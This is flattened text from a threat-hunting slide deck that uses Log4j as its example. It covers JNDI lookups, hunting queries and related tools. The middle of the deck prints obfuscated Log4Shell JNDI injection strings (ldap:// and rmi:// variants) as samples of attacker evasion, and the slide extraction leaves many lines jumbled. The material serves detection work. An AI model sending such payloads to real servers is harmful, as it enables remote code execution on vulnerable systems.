Professional Documents
Culture Documents
Real-World Example:
A Walkthrough of
Interpreting Results
Threat Hunting for
Log4j
Log4j: Anatomy
"Lookups provide a
log4j is a popular
Other logging packages way to add values to
logging package for
like SLF4J/Logback the Log4j configuration
Java
at arbitrary places"
"The JNDI API is a generic API for accessing any naming
JNDI or directory service"
log4j-jndi-be-gone by nccgroup
The Art of Querying: Techniques for Effective
Threat Hunting
clear understanding
2. compound Checking for netflow traffic and cross correlating with DNS query and
query proxy logs.
3. statistical Check prevalence of process for all users, then checking prevalence of
query the process by counting the combination of process and users.
Know your environment and data
1. ${${::-j}${::-n}${::-d}${::-i}:$
• Variation {::-l}${::-d}${::-a}${::-p}://
• Obfuscation ${${::-j}${::-n}${::-d}${::-i}:${::-r}
• Common Information Model ${::-m}${::-i}
• Attacker Trickery 2. ${${lower:j}${upper:n}$
{lower:d}${upper:i}:$
{lower:l}d${lower:a}p://
${${lower:j}${upper:n}$
{lower:d}${upper:i}:$
{lower:r}m${lower:i}://
Hunt for similar Vulnerabilities
Check “
Hunt for deserialization
Threat-intel based Hunt for exposed devices
vulnerabilities with
hunting allows you to ” by Microsoft for generic
heyserial, yoserial,
step into several roles inventor and
marshelsec
vulnerabilities
Questions?